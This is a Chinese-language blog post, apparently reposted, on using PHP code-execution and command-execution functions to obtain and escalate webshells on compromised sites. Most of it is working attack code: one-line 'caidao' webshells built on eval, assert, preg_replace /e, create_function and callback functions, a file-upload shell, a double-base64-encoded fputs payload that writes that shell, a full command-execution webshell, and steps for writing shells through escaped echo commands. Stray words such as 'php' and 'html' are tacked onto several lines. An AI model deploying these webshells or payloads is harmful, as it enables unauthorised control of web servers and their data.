代码执行函数 VS 命令执行函数php
一直想整理这两块的内容,可是一直没时间弄,直到前两天碰上一个写入了菜刀马可是死活连不上菜刀的站,顿时不知道怎么继续了,因此就趁这个机会整理了一下代码执行函数怎么getshell和命令执行函数怎么getshell的思路,各位大牛有什么想法能够一块儿交流一下。那么咱们开始正题。html
菜刀马的原理实际上是调用了代码执行函数。而菜刀之因此可以执行系统命令和上传文件,也是调用了命令执行函数。命令马的原理是调用了命令执行函数。mysql
这两种都可以getshell(以上传大马为准)由于有一些服务器作了限制,好比菜刀连不上,或者禁用了某些函数,或者利用SQL注入写文件和XML之类的漏洞,因此有时候在有了菜刀马和命令马以后要上传大马仍是有一些波折的,固然可以直接上传或写入大马的除外。sql
1、shell
首先是菜刀马:数组
菜刀马的原理是调用了PHP的代码执行函数,好比如下1和2两个常见的一句话菜刀马,就是调用了eval函数、assert函数。服务器
一、eval()函数函数
#传入的参数必须为PHP代码,既须要以分号结尾。 #命令執行:cmd=system(whoami);
#菜刀链接密码:cmd <?php @eval($_POST['cmd']);?>
那么当咱们上传了eval函数的菜刀马以后,在链接不上菜刀的状况下怎么上传大马呢?继续往下看post
这里我是先写一个上传马,再用上传马去上传大马,有点屡次一举,可是考虑到大马代码量太多,仍是建议先写个上传马,如下代码只有1kb。网站
<?php @$temp = $_FILES['upload_file']['tmp_name']; @$file = basename($_FILES['upload_file']['name']); if (empty ($file)){ echo "<form action = '' method = 'POST' ENCTYPE='multipart/form-data'>\n";echo "Local file: <input type = 'file' name = 'upload_file'>\n";echo "<input type = 'submit' value = 'Upload'>\n";echo "</form>\n<pre>\n\n</pre>";}else {if(move_uploaded_file($temp,$file)){echo "File uploaded successfully.<p>\n";}else {echo "Unable to upload " . $file . ".<p>\n";}}?>
原理是利用文件操做函数以下:
fputs(fopen(shell.php,w),xxxx);
写入xxxx到脚本执行文件当前目录下的shell.php文件。
因为是利用post传参,不能出现【<】【>】【+】【=】【/】等符号,因此这里咱们须要把代码编码一下,将上面的上传代码进行两次base64编码(为了去除=号)。
☆☆☆在编码的时候空格和回车都会影响编码后的结果,所以建议你们直接复制我上面的上传马或者用下面我编码好的,或者本身去慢慢尝试直到base64编码后为一串自由数字和字母的字符串便可。
接下来利用文件操做函数写入上传马,注意不要忘了最后的分号。
cmd=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
成功获得上传马,以后就是上传咱们的大马了。
二、assert()函数
#assert函数是直接将传入的参数当成PHP代码直接,不须要以分号结尾,固然你加上也能够。 #命令執行:cmd=system(whoami) #菜刀链接密码:cmd <?php @assert($_POST['cmd'])?>
上传大马,这一步参考eval函数。
其余的代码执行函数还有如下几个,均给出了菜刀链接方式:
三、preg_replace()
#preg_replace('正则规则','替换字符','目标字符')
#执行命令和上传文件参考assert函数(不须要加分号)。 #将目标字符中符合正则规则的字符替换为替换字符,此时若是正则规则中使用/e修饰符,则存在代码执行漏洞。 preg_replace("/test/e",$_POST["cmd"],"jutst test");
这里可使用chr()函数转换ASCII编码来执行代码。
#phpinfo(); eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))
四、create_function()函数
#建立匿名函数执行代码 #执行命令和上传文件参考eval函数(必须加分号)。 #菜刀链接密码:cmd $func =create_function('',$_POST['cmd']);$func();
五、array_map()函数
#array_map() 函数将用户自定义函数做用到数组中的每一个值上,并返回用户自定义函数做用后的带有新值的数组。 回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。 #命令执行http://localhost/123.php?func=system cmd=whoami #菜刀链接http://localhost/123.php?func=assert 密码:cmd $func=$_GET['func']; $cmd=$_POST['cmd']; $array[0]=$cmd; $new_array=array_map($func,$array); echo $new_array;
六、call_user_func()函数
#传入的参数做为assert函数的参数 #cmd=system(whoami) #菜刀链接密码:cmd call_user_func("assert",$_POST['cmd']);
七、call_user_func_array()函数
#将传入的参数做为数组的第一个值传递给assert函数 #cmd=system(whoami) #菜刀链接密码:cmd $cmd=$_POST['cmd']; $array[0]=$cmd; call_user_func_array("assert",$array);
八、array_filter()函数
#用回调函数过滤数组中的元素:array_filter(数组,函数) #命令执行func=system&cmd=whoami #菜刀链接http://localhost/123.php?func=assert 密码cmd $cmd=$_POST['cmd']; $array1=array($cmd); $func =$_GET['func']; array_filter($array1,$func);
九、uasort()函数
#php环境>=<5.6才能用 #uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。 #命令执行:http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami); #菜刀链接:http://localhost/123.php?1=1+1&2=eval($_POST[cmd]) 密码:cmd usort($_GET,'asse'.'rt');
2、
命令执行函数
PHP执行系统命令的有几个经常使用的函数,若有:system函数、exec函数、popen函数,passthru,shell_exec函数他们均可以执行系统命令,下面是我整理的一个命令马,把常见的命令执行函数都作了一个梳理,若是你们还有什么新的思路或看法,能够一块儿交流交流。
<?php $command=$_POST['cmd']; #function exec_all($command) #{ //system函数可执行并直接显示结果 if(function_exists('system')) { echo "<pre>"; system($command); echo "</pre>"; } //passthru函数可执行并直接显示结果 else if(function_exists('passthru')) { echo "<pre>"; passthru($command); echo "</pre>"; } //shell_exec函数可执行但须要加echo才能显示结果 else if(function_exists('shell_exec')) { echo "<pre>"; echo shell_exec($command); echo "</pre>"; } //function exec(命令,以数组形式的保存结果,命令执行的状态码) //可执行,但须要加echo才能显示结果 else if(function_exists('exec')) { echo "<pre>"; exec($command,$output); echo "</br>"; print_r($output); echo "</pre>"; } //popen函数:打开一个指向进程的管道,该进程由派生指定的 command 命令执行而产生。 //返回一个和 fopen() 所返回的相同的文件指针,只不过它是单向的(只能用于读或写) //此指针能够用于 fgets(),fgetss() 和 fwrite()。而且必须用 pclose() 来关闭。 //若出错,则返回 false。 else if(function_exists('popen')) { $handle = popen($command , "r"); // Open the command pipe for reading if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { echo "<pre>"; while(!feof($handle)) { echo fread($handle, 1024); } echo "</pre>"; } else if(function_exists('fgets') && function_exists('feof')) { echo "<pre>"; while(!feof($handle)) { echo fgets($handle,1024); } echo "<pre>"; } } pclose($handle); } //proc_open — 执行一个命令,而且打开用来输入/输出的文件指针。 else if(function_exists('proc_open')) { $descriptorspec = array( 1 => array("pipe", "w"), // stdout is a pipe that the child will write to ); $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes' if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { echo "<pre>"; while(!feof($pipes[1])) { echo fread($pipes[1], 1024); } echo "</pre>"; } else if(function_exists('fgets') && function_exists('feof')) { echo "<pre>"; while(!feof($pipes[1])) { echo fgets($pipes[1],1024); } echo "<pre>"; } } #pclose($handle); } else { echo 'GG'; } #}
其余函数:
暂时就知道其余两个函数,不过也都是基于以上的函数所变化的。
<?php $cmd=$_POST['cmd']; echo "<pre>"; //可执行并直接显示结果,反引号,波浪键。 //shell_exec() 函数实际上仅是反撇号 (`) 操做符的变体 //因此若是把shell_exec()函数禁用了,反撇号 (`)也是执行不了命令的。 echo `$cmd`; //注意,这个只显示结果的第一行,所以基本只能执行whoami //ob_start:打开缓冲区,须要system函数开启 $a = 'system'; ob_start($a); echo "$_POST[cmd]"; ob_end_flush(); echo "</pre>";
上面讲完命令执行命令,也均可以执行命令了,那么如何利用这些命令马来进一步上传咱们的大马呢,这里就要涉及到一下CMD命令了,有兴趣的同窗能够去参考连接查看《CMD命令特殊符号》的文章。
这里了我是用echo写文件的思路,遗忘大佬教的用msf结合命令行去下载大马我暂时还没去实践,就留着之后有时间再写了,废话很少说,开干吧!
成功执行命令以后,首先利用【dir】命令获得网站路径,若是是mysql注入获得的os-shell也可用【dir d:\ /b】命令查找存放网站程序的路径。
而后用【echo】命令写入咱们的上传马
☆☆☆这里注意【<】【>】【&】这三个字符在CMD命令行中有特殊意义,须要在前面加【^】进行转义,能够用文本的替换来实现这个功能。
写入成功以后就能够上传咱们的大马啦 ^-^!而后就看你们的啦,该修复修复,想提交提交,到这里就结束啦,有什么意见欢迎一块儿交流交流。
参考连接:
https://www.cnblogs.com/xiaozi/p/7834367.html
https://blog.csdn.net/yatere/article/details/7765270
http://blog.163.com/magicc_love/blog/static/185853662201542810350983/
笨鸟先飞早入林,笨人勤学早成材。
转载请注明出处:
撰写人:fox-yu http://www.cnblogs.com/fox-yu/